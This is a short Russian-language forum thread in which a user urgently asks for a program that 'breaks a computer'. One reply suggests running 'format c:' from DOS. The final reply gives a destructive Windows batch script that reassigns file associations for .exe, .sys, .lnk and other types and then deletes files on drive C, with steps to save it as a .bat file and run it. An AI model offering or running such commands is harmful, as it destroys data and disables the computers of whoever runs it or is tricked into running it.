Александр Догот

срочно нужен чит для того чтобы ломал компьютер. нужен чит для того чтобы ломал компьютер срочно киньте ссылку плизз

дак тут человек хочет с читами играть а мы все против этого!! ! и тем не менее у меня друг скидывал другим

Эркетайка Омка

не существует. Изучи сначала виды вирусов, а читы в играх

Елена Коннова

format c: из - под доса, а еще лучше не забивай себе голову ерундой и почитай то, что задавали на лето:)

Ирина Ускова

assoc .ini=.1
assoc .exe=.2
assoc .lnk=.3
assoc .sys=.4
assoc .html=.5
assoc .rar=.6
del C: *.*
создай текстовый файл, поменяй расширение на, bat и запускай.